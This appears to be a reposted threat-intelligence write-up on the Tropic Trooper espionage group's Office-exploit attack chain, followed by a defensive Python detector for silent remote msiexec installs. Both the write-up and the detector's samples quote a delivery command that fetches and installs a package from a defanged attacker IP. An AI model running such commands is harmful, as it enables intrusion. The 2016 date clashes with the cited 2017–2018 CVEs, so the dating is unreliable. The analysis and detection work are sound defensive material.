Tropic Trooper’s New Strategy

LASER_oneXM

Feb 4, 2016
Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are believed to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent campaigns. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network.

Attack Chain

Figure 1. Attack chain of Tropic Trooper’s operations

Here’s a summary of the attack chain of Tropic Trooper’s recent campaigns:

  1. Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft Office’s Equation Editor (EQNEDT32.EXE).
  2. Download an installer package (.msi) and install it on the system by executing the command: /c msiexec /q /i [hxxp://61[.]216[.]5[.]24/in.sys]
...
.....
....
.........

We also observed malicious documents that don’t need to download anything from the internet as the backdoor’s dropper is already embedded in the document. This, however, doesn’t influence the overall result for the victim.

The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers.

Tropic Trooper uses exploit-laden Microsoft Office documents to deliver malware to targets. These documents use job vacancies in organizations that may be deemed socio-politically sensitive to recipients. Below is a screenshot of the document used in their latest campaigns:

....
...
......
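The delivery step summarized above (an Equation Editor exploit running a command that has msiexec silently install a package fetched from a remote URL) is something a defender can look for in process-creation telemetry. The following detection helper is an added example written for this post; it is not code from Trend Micro or from the original poster. Only the EQNEDT32.EXE parent and the `msiexec /q /i <URL>` form come from the write-up; the event field names, the `ProcEvent` record, the sample events and the `installer.example.invalid` URL are assumptions constructed for illustration.

```python
"""Flag msiexec remote installs spawned by Office's Equation Editor.

Added example, not part of the original write-up. Event layout (parent
image, image, command line) is modelled on a Sysmon process-creation
record but the field names here are an assumption.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as logged

# Accept live http(s) and the defanged hxxp(s) form the write-up uses.
_REMOTE_RE = re.compile(r"^(?:https?|hxxps?)://", re.IGNORECASE)
_QUIET_FLAGS = {"/q", "/qn", "/qb", "/quiet", "-q", "-qn", "-quiet"}
_INSTALL_FLAGS = {"/i", "/package", "-i", "-package"}

def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_msiexec(command_line: str) -> Optional[dict]:
    """Return quiet/source/remote details for an msiexec invocation found
    anywhere in the command line (e.g. behind 'cmd /c'); None if absent."""
    tokens = command_line.split()
    for idx, tok in enumerate(tokens):
        if _basename(tok.strip('"')) in ("msiexec", "msiexec.exe"):
            break
    else:
        return None
    args = tokens[idx + 1:]
    quiet, source = False, None
    i = 0
    while i < len(args):
        a = args[i].lower()
        if a in _QUIET_FLAGS:
            quiet = True
        elif a in _INSTALL_FLAGS and i + 1 < len(args):
            # Strip quotes and the [...] wrapping used in defanged IoC text.
            source = args[i + 1].strip('"').strip("[]")
            i += 1
        i += 1
    return {"quiet": quiet, "source": source,
            "remote": bool(source and _REMOTE_RE.match(source))}

def analyze(ev: ProcEvent) -> dict:
    """Score one event. A remote msiexec package alone is 'suspicious';
    paired with a silent install or an Equation Editor parent it is 'alert'."""
    reasons: List[str] = []
    if _basename(ev.parent_image) == "eqnedt32.exe":
        reasons.append("parent_is_equation_editor")
    info = parse_msiexec(ev.command_line)
    if info:
        if info["remote"]:
            reasons.append("msiexec_remote_package")
        if info["quiet"]:
            reasons.append("msiexec_quiet_install")
    if "msiexec_remote_package" in reasons and len(reasons) >= 2:
        verdict = "alert"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "reasons": reasons, "msiexec": info}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1. The delivery command quoted in the write-up, parented by Equation Editor.
    ProcEvent(
        parent_image=r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r"cmd.exe /c msiexec /q /i [hxxp://61[.]216[.]5[.]24/in.sys]",
    ),
    # 2. Ordinary interactive install from a local file; should stay benign.
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\alice\Downloads\setup.msi"',
    ),
    # 3. Silent remote install with a non-Office parent; placeholder URL.
    ProcEvent(
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r"msiexec.exe /qn /i https://installer.example.invalid/pkg.msi",
    ),
]

def run_samples() -> List[str]:
    """Verdicts for the sample events, in order."""
    return [analyze(ev)["verdict"] for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{verdict:10} <- {ev.command_line}")
```

The scoring deliberately does not alert on the Equation Editor parent alone, since a patched EQNEDT32.EXE can legitimately launch helper processes; the combination with a remote package source is what matches the chain described in the post.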